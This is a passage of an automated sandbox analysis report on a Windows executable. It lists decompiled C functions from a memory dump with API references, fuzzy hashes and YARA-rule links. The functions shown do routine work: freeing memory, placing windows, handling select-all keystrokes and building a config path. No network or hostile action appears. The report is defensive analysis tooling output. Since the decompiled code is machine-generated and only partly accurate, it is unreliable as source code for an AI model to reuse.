                                                                                                        • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3641025914-0
                                                                                                        • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                        • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                                        • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                        • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 68%
                                                                                                        			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}














                                                                                                        0x004067ac
                                                                                                        0x004067af
                                                                                                        0x004067b5
                                                                                                        0x004067ba
                                                                                                        0x004067bf
                                                                                                        0x004067c1
                                                                                                        0x004067c6
                                                                                                        0x004067c7
                                                                                                        0x004067cc
                                                                                                        0x004067cd
                                                                                                        0x004067d2
                                                                                                        0x004067d4
                                                                                                        0x004067d9
                                                                                                        0x004067da
                                                                                                        0x004067df
                                                                                                        0x004067e0
                                                                                                        0x004067e5
                                                                                                        0x004067e7
                                                                                                        0x004067ec
                                                                                                        0x004067ed
                                                                                                        0x004067f2
                                                                                                        0x004067f3
                                                                                                        0x004067f8
                                                                                                        0x004067fa
                                                                                                        0x004067ff
                                                                                                        0x00406800
                                                                                                        0x00406805
                                                                                                        0x00406806
                                                                                                        0x00406808
                                                                                                        0x0040680f
                                                                                                        0x00406810
                                                                                                        0x00406812
                                                                                                        0x00406817
                                                                                                        0x0040681e
                                                                                                        0x00406828
                                                                                                        0x0040682b
                                                                                                        0x0040682c
                                                                                                        0x0040681e
                                                                                                        0x00406835
                                                                                                        0x00406839
                                                                                                        0x00406841

                                                                                                        APIs
                                                                                                          • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                          • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                          • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                          • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                          • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                                        • free.MSVCRT(00000000), ref: 00406839
                                                                                                          • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ??3@$free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2241099983-0
                                                                                                        • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                        • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                                        • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                        • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}









                                                                                                        0x00405d03
                                                                                                        0x00405d06
                                                                                                        0x00405d10
                                                                                                        0x00405d17
                                                                                                        0x00405d22
                                                                                                        0x00405d32
                                                                                                        0x00405d40
                                                                                                        0x00405d48
                                                                                                        0x00405d4e
                                                                                                        0x00405d54
                                                                                                        0x00405d59
                                                                                                        0x00405d5c
                                                                                                        0x00405d61
                                                                                                        0x00405d67

                                                                                                        APIs
                                                                                                        • GetParent.USER32(?), ref: 00405D0A
                                                                                                        • GetWindowRect.USER32 ref: 00405D17
                                                                                                        • GetClientRect.USER32 ref: 00405D22
                                                                                                        • MapWindowPoints.USER32 ref: 00405D32
                                                                                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Window$Rect$ClientParentPoints
                                                                                                        • String ID:
                                                                                                        • API String ID: 4247780290-0
                                                                                                        • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                        • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                                        • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                        • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 89%
                                                                                                        			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}











                                                                                                        0x004083dc
                                                                                                        0x004083e2
                                                                                                        0x004083e9
                                                                                                        0x004083ea
                                                                                                        0x004083eb
                                                                                                        0x004083f3
                                                                                                        0x004083f6
                                                                                                        0x004083f8
                                                                                                        0x00408401
                                                                                                        0x00408404
                                                                                                        0x00408407
                                                                                                        0x00408409
                                                                                                        0x0040840c
                                                                                                        0x00408413
                                                                                                        0x0040841d
                                                                                                        0x00408427
                                                                                                        0x0040842c
                                                                                                        0x0040842f
                                                                                                        0x00408432
                                                                                                        0x00408435
                                                                                                        0x00408438
                                                                                                        0x00408439
                                                                                                        0x0040843e
                                                                                                        0x0040843f
                                                                                                        0x00408442
                                                                                                        0x0040844a

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$??2@??3@
                                                                                                        • String ID:
                                                                                                        • API String ID: 1252195045-0
                                                                                                        • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                        • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                                        • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                        • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 76%
                                                                                                        			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}








                                                                                                        0x00406746
                                                                                                        0x00406746
                                                                                                        0x0040674f
                                                                                                        0x00406751
                                                                                                        0x00406752
                                                                                                        0x00406757
                                                                                                        0x00406758
                                                                                                        0x0040675d
                                                                                                        0x0040675f
                                                                                                        0x00406760
                                                                                                        0x00406765
                                                                                                        0x00406766
                                                                                                        0x0040676e
                                                                                                        0x00406770
                                                                                                        0x00406771
                                                                                                        0x00406776
                                                                                                        0x00406777
                                                                                                        0x0040677f
                                                                                                        0x00406781
                                                                                                        0x00406785
                                                                                                        0x00406787
                                                                                                        0x00406788
                                                                                                        0x0040678e
                                                                                                        0x0040678e
                                                                                                        0x00406790
                                                                                                        0x00406791
                                                                                                        0x00406796
                                                                                                        0x00406798
                                                                                                        0x0040679e
                                                                                                        0x004067a1
                                                                                                        0x004067a4
                                                                                                        0x004067ab

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ??3@
                                                                                                        • String ID:
                                                                                                        • API String ID: 613200358-0
                                                                                                        • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                        • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                                        • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                        • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 87%
                                                                                                        			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}









                                                                                                        0x0040aba8
                                                                                                        0x0040aba9
                                                                                                        0x0040abb0
                                                                                                        0x0040abb2
                                                                                                        0x0040abb5
                                                                                                        0x0040ac19
                                                                                                        0x0040ac2c
                                                                                                        0x0040ac2e
                                                                                                        0x0040ac36
                                                                                                        0x0040ac39
                                                                                                        0x0040ac39
                                                                                                        0x0040ac1b
                                                                                                        0x0040ac21
                                                                                                        0x0040ac21
                                                                                                        0x0040abb7
                                                                                                        0x0040abcb
                                                                                                        0x0040abce
                                                                                                        0x0040abd7
                                                                                                        0x0040abe6
                                                                                                        0x0040abf6
                                                                                                        0x0040abfe
                                                                                                        0x0040ac09
                                                                                                        0x0040ac0f
                                                                                                        0x0040ac12
                                                                                                        0x0040ac4f

                                                                                                        APIs
                                                                                                        • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                                          • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                          • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                          • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                        • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                        • String ID: $
                                                                                                        • API String ID: 2498372239-3993045852
                                                                                                        • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                        • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                                        • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                        • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54keyboardwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}




                                                                                                        0x00403a7d
                                                                                                        0x00403a8c
                                                                                                        0x00403a9c
                                                                                                        0x00403aba
                                                                                                        0x00403adf
                                                                                                        0x00403ae7
                                                                                                        0x00403af4
                                                                                                        0x00403af4
                                                                                                        0x00403ae7
                                                                                                        0x00403aba
                                                                                                        0x00403a9c
                                                                                                        0x00403b13

                                                                                                        APIs
                                                                                                        • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                                          • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                                        • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: State$CallMessageProcSendWindow
                                                                                                        • String ID: A
                                                                                                        • API String ID: 3924021322-3554254475
                                                                                                        • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                        • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                                        • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                        • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 91%
                                                                                                        			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}













                                                                                                        0x004034f0
                                                                                                        0x004034f8
                                                                                                        0x00403506
                                                                                                        0x00403516
                                                                                                        0x0040351c
                                                                                                        0x00403531
                                                                                                        0x00403537
                                                                                                        0x00403545
                                                                                                        0x0040354a
                                                                                                        0x00403556
                                                                                                        0x00403567
                                                                                                        0x00403575
                                                                                                        0x00403583
                                                                                                        0x00403583
                                                                                                        0x00403586
                                                                                                        0x00403592
                                                                                                        0x00403598
                                                                                                        0x004035ac

                                                                                                        APIs
                                                                                                          • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                                          • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                                          • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                                          • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                                          • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                                        • memset.MSVCRT ref: 00403537
                                                                                                        • _ultow.MSVCRT ref: 00403575
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ??2@$memset$_ultow
                                                                                                        • String ID: cf@$q
                                                                                                        • API String ID: 3448780718-2693627795
                                                                                                        • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                        • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                                        • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                        • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 83%
                                                                                                        			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				return E00402FC6(_t29, _t36,  &_v532);
			}










                                                                                                        0x00402f3a
                                                                                                        0x00402f51
                                                                                                        0x00402f60
                                                                                                        0x00402f6f
                                                                                                        0x00402f78
                                                                                                        0x00402f7a
                                                                                                        0x00402f7a
                                                                                                        0x00402f8a
                                                                                                        0x00402f8f
                                                                                                        0x00402f94
                                                                                                        0x00402f99
                                                                                                        0x00402f9e
                                                                                                        0x00402f9f
                                                                                                        0x00402fad
                                                                                                        0x00402fb2
                                                                                                        0x00402fb2
                                                                                                        0x00402fc5

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00402F51
                                                                                                          • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                        • wcsrchr.MSVCRT ref: 00402F6F
                                                                                                        • wcscat.MSVCRT ref: 00402F8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                        • String ID: .cfg
                                                                                                        • API String ID: 776488737-3410578098
                                                                                                        • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                        • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                                        • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                        • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 64%
                                                                                                        			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}











                                                                                                        0x00407e2d
                                                                                                        0x00407e46
                                                                                                        0x00407e48
                                                                                                        0x00407e4d
                                                                                                        0x00407e5f
                                                                                                        0x00407e6b
                                                                                                        0x00407e6f
                                                                                                        0x00407e75
                                                                                                        0x00407e7c
                                                                                                        0x00407e7d
                                                                                                        0x00407e88
                                                                                                        0x00407e8d
                                                                                                        0x00407e8e
                                                                                                        0x00407eaa

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00407E48
                                                                                                        • memset.MSVCRT ref: 00407E5F
                                                                                                          • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                          • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                        • _snwprintf.MSVCRT ref: 00407E8E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
